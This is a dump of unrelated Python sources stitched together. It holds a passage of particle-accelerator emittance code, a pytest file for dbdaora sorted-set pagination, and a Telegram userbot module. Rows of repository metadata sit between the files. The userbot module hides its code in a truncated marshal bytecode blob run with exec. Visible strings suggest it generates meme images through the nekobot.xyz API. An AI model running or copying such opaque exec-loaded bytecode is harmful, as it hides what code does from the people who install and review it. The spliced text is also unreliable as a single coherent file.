taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
Qs0=_math.sqrt(param['ap']*param['hh']*_math.sqrt(param['Vrf']**2-U0**2)/(2*_math.pi*param['En']))
#Creates a dict that's a subset of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['ssi']=param['ss0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
while (difftot>10**(-7)):
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']
#print Tx,Ty,Tp
exx=(-param['ex0']+_math.exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+_math.exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+_math.exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
# Accelerating cavity system only
sss=inter['spi']*param['C']*_math.sqrt(param['ap']*param['En']/(2*_math.pi*param['hh']*(param['Vrf']**2-U0**2)**0.5));
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances using the results from tracking to calculate bunch length
def Iterate_emittances3HC(twiss,param,phimain,Vmain,phiharm,Vharm):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#Calculate synchronous phase
Phi_sync_nat=asin(U0/param['Vrf'])
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Calculate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
#RF frequency
w_rf =2*pi*(param['hh']*param['cluz']/param['C']-param['Detune0']) #Generator Frequency
#Creates arrays for 3HC calculation
posz=_np.zeros(5000)
perfil=_np.zeros(5000)
pot=_np.zeros(5000)
#Define longitudinal scale array
posz=_np.arange(0,5000.)/10-250 # in millimeters
#Creates a dict that's a subset of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*param['sp0']**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
inter['ssi']=sigma_mm/1000
while (difftot>10**(-7)):
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']
#print Tx,Ty,Tp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
#Calculate bunch length according to the RF potential (Main RF + 3HC)
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*spp**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
sss=sigma_mm/1000
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances for the case with no harmonic system (simple calculation of the bunch length) but
# takes into account the longitudinal growth rate due to microwave instability
def Iterate_emittancesMW(twiss,param,sigS,Curr,GT):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#print U0
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Calculate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
Qs0=sqrt(param['ap']*param['hh']*sqrt(param['Vrf']**2-U0**2)/(2*pi*param['En']))
# Define the interpolation function for Microwave Instability
microwave=interp2d(sigS,Curr,GT,kind='linear')
#Creates a dict that's a subset of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['ssi']=param['ss0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
sss=param['ss0']
while (difftot>10**(-7)):
#Add the Microwave growth rate to the longitudinal plane
DTp=microwave(sss,param['Np'])
#print DTp
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']+DTp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
#eyy=(-param['ey0']+exp(2*tt*(Ty-1/tauy))*(param['ey0']+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
# Accelerating cavity system only
sss=inter['spi']*param['C']*sqrt(param['ap']*param['En']/(2*pi*param['hh']*(param['Vrf']**2-U0**2)**0.5));
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances using the results from tracking to calculate bunch length
# and also takes into account the longitudinal growth rate due to microwave instability
def Iterate_emittances3HC_MW(twiss,param,phimain,Vmain,phiharm,Vharm,sigS,Curr,GT):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#Calculate synchronous phase
Phi_sync_nat=asin(U0/param['Vrf'])
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Calculate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
Qs0=sqrt(param['ap']*param['hh']*sqrt(param['Vrf']**2-U0**2)/(2*pi*param['En']))
# Define the interpolation function for Microwave Instability
microwave=interp2d(sigS,Curr,GT,kind='linear')
#RF frequency
w_rf =2*pi*(param['hh']*param['cluz']/param['C']-param['Detune0']) #Generator Frequency
#Creates arrays for 3HC calculation
posz=_np.zeros(5000)
perfil=_np.zeros(5000)
pot=_np.zeros(5000)
#Define longitudinal scale array
posz=_np.arange(0,5000.)/10-250 # in millimeters
#Creates a dict that's a subset of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*param['sp0']**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
inter['ssi']=sigma_mm/1000
sss=inter['ssi'] #seed the bunch length used by the first microwave-growth lookup (sss was undefined on the first pass)
while (difftot>10**(-7)):
#Add the Microwave growth rate to the longitudinal plane
DTp=microwave(sss,param['Np'])
#print DTp
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']+DTp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
#Calculate bunch length according to the RF potential (Main RF + 3HC)
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*spp**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
sss=sigma_mm/1000
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
| 34.508584
| 333
| 0.595983
| 2,584
| 16,081
| 3.646285
| 0.10565
| 0.022925
| 0.025472
| 0.027595
| 0.816493
| 0.807684
| 0.787094
| 0.783379
| 0.781044
| 0.775313
| 0
| 0.059916
| 0.169703
| 16,081
| 465
| 334
| 34.582796
| 0.645746
| 0.183198
| 0
| 0.720848
| 0
| 0
| 0.080963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028269
| false
| 0
| 0.007067
| 0.003534
| 0.063604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2133f63d9155e888950f79082b5b41231cb947c5
| 6,273
|
py
|
Python
|
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 21
|
2019-10-14T14:33:33.000Z
|
2022-02-11T04:43:07.000Z
|
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | null | null | null |
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 1
|
2019-09-29T23:51:44.000Z
|
2019-09-29T23:51:44.000Z
|
import itertools
import pytest
from dbdaora import EntityNotFoundError
@pytest.fixture(autouse=True)
async def set_fallback_data(fake_service, fake_entity_withscores):
data = list(itertools.chain(*fake_entity_withscores.data))
fake_service.repository.fallback_data_source.db['fake:fake'] = {
'id': 'fake',
'data': data,
}
@pytest.mark.asyncio
async def test_should_get_one_page_size(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id, page_size=1, memory=False,
)
fake_entity.data = [b'1']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_page_size_and_page(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=2,
memory=False,
)
fake_entity.data = [b'2']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_page_size_and_page_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_and_withmaxsize_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withmaxsize=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_withmaxsize_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withmaxsize=True,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_and_page_size(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
memory=False,
)
fake_entity.data = [b'2']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_page(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=2,
memory=False,
)
fake_entity.data = [b'1']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withscores(
fake_service, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=2,
reverse=True,
withscores=True,
memory=False,
)
fake_entity_withscores.data = [(b'1', 0)]
assert entity == fake_entity_withscores
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_withmaxsize(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
reverse=True,
withmaxsize=True,
memory=False,
)
fake_entity.data = [b'2']
fake_entity.max_size = 2
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_withmaxsize_and_withscores(
fake_service, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
reverse=True,
withscores=True,
withmaxsize=True,
memory=False,
)
fake_entity_withscores.data = [(b'2', 1)]
fake_entity_withscores.max_size = 2
assert entity == fake_entity_withscores
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_page_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withmaxsize_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withmaxsize=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_withmaxsize_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withmaxsize=True,
withscores=True,
memory=False,
)
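# Hedged editor sketch (not part of the original test module): the *_not_found cases above
# differ only in the extra keyword flags passed to get_one(), so they could be collapsed
# with pytest.mark.parametrize.  Fixture names and get_one() arguments are taken from the
# tests above; the test name itself is illustrative.
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'extra_kwargs',
    [
        {},
        {'withscores': True},
        {'withmaxsize': True},
        {'withmaxsize': True, 'withscores': True},
    ],
)
async def test_should_not_find_page_out_of_range(
    fake_service, fake_entity_withscores, extra_kwargs
):
    with pytest.raises(EntityNotFoundError):
        await fake_service.get_one(
            fake_id=fake_entity_withscores.fake_id,
            page_size=1,
            page=3,
            memory=False,
            **extra_kwargs,
        )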
| 26.029046
| 90
| 0.68197
| 793
| 6,273
| 4.984868
| 0.061791
| 0.134075
| 0.1872
| 0.084999
| 0.925373
| 0.913989
| 0.913989
| 0.895775
| 0.875538
| 0.875538
| 0
| 0.007798
| 0.243584
| 6,273
| 240
| 91
| 26.1375
| 0.82529
| 0
| 0
| 0.773869
| 0
| 0
| 0.004145
| 0
| 0
| 0
| 0
| 0
| 0.035176
| 1
| 0
| false
| 0
| 0.015075
| 0
| 0.015075
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d212b9b6d76d83d1aa21a653188d8c28ddf0e75
| 19,279
|
py
|
Python
|
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x84\x01\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x02l\x00m\x01Z\x01\x01\x00d\x00d\x01l\x02Z\x02d\x00d\x03l\x02m\x03Z\x03\x01\x00d\x00d\x04l\x04m\x05Z\x05\x01\x00d\x00d\x05l\x06m\x07Z\x07\x01\x00d\x00d\x01l\x08Z\x08d\x00d\x01l\tZ\td\x00d\x01l\nZ\nd\x00d\x01l\x0bZ\x0bd\x00d\x06l\x0bm\x0cZ\x0c\x01\x00d\x00d\x07l\rm\x0eZ\x0e\x01\x00d\x00d\x08l\x0fm\x10Z\x10\x01\x00d\x00d\tl\x11m\x12Z\x12\x01\x00d\x00d\nl\x13m\x14Z\x14\x01\x00d\x00d\x0bl\x15m\x16Z\x16\x01\x00e\x0b\xa0\x17d\x0c\xa1\x01Z\x18e\x19e\x19d\r\x9c\x02d\x0ed\x0f\x84\x04Z\x1ad\x10d\x11\x84\x00Z\x1bd\x12d\x13\x84\x00Z\x1cd\x14d\x15\x84\x00Z\x1dd\x16d\x17\x84\x00Z\x1ed\x18d\x19\x84\x00Z\x1fd\x1ad\x1b\x84\x00Z d\x1cd\x1d\x84\x00Z!e\x07d\x1ed\x1fd \x8d\x02d!d"\x84\x00\x83\x01Z"e\x07d\x1fd#d$\x8d\x02d%d&\x84\x00\x83\x01Z#e\x07d\'d\x1fd \x8d\x02d(d"\x84\x00\x83\x01Z"e\x07d)d\x1fd \x8d\x02d*d"\x84\x00\x83\x01Z"e\x07d+d\x1fd \x8d\x02d,d"\x84\x00\x83\x01Z"e\x07d\x1fd-d$\x8d\x02d.d/\x84\x00\x83\x01Z$e\x16\xa0%d"d0i\x01\xa1\x01\x01\x00d\x01S\x00)1\xe9\x00\x00\x00\x00N)\x01\xda\x06choice)\x01\xda\x05sleep)\x01\xda\x06events)\x01\xda\x08register)\x01\xda\x03sub)\x01\xda\rBeautifulSoup)\x01\xda\x10get_emoji_regexp)\x01\xda\x05Image)\x01\xda\x03url)\x01\xda\x08CMD_HELPud\x00\x00\x00[\xf0\x9f\x87\xa0-\xf0\x9f\x87\xbf\xf0\x9f\x8c\x80-\xf0\x9f\x97\xbf\xf0\x9f\x98\x80-\xf0\x9f\x99\x8f\xf0\x9f\x9a\x80-\xf0\x9f\x9b\xbf\xf0\x9f\x9c\x80-\xf0\x9f\x9d\xbf\xf0\x9f\x9e\x80-\xf0\x9f\x9f\xbf\xf0\x9f\xa0\x80-\xf0\x9f\xa3\xbf\xf0\x9f\xa4\x80-\xf0\x9f\xa7\xbf\xf0\x9f\xa8\x80-\xf0\x9f\xa9\xaf\xf0\x9f\xa9\xb0-\xf0\x9f\xab\xbf\xe2\x9c\x82-\xe2\x9e\xb0]+)\x02\xda\x0binputString\xda\x06returnc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x0e\x00\x00\x00t\x00\xa0\x01t\x02d\x01|\x00\xa1\x03S\x00)\x02z7Remove emojis and other non-safe characters from string\xda\x00)\x03\xda\x02rer\x06\x00\x00\x00\xda\rEMOJI_PATTERN)\x01r\x0c\x00\x00\x00\xa9\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\tdeEmojify#\x00\x00\x00s\x02\x00\x00\x00\x00\x02r\x12\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz6https://nekobot.xyz/api/imagegen?type=trumptweet&text=\xda\x07message\xfa\x16check syntax once 
more\xfa\x08temp.png\xda\x02wb\xda\x03RGB\xfa\x08temp.jpg\xda\x04jpeg\xa9\n\xda\x08requests\xda\x03getZ\x04jsonr\n\x00\x00\x00\xda\x04open\xda\x05writeZ\x07contentr\t\x00\x00\x00Z\x07convertZ\x04save\xa9\x06\xda\x04text\xda\x01r\xda\x05sandy\xda\x06caturl\xda\x01f\xda\x03imgr\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\ntrumptweet\'\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r&\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz8https://nekobot.xyz/api/imagegen?type=changemymind&text=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x0cchangemymind4\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz4https://nekobot.xyz/api/imagegen?type=kannagen&text=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00z\ttemp.webp\xda\x04webpr\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08kannagenA\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r)\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sx\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x03\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s0d\x04S\x00t\x04d\x05d\x06\x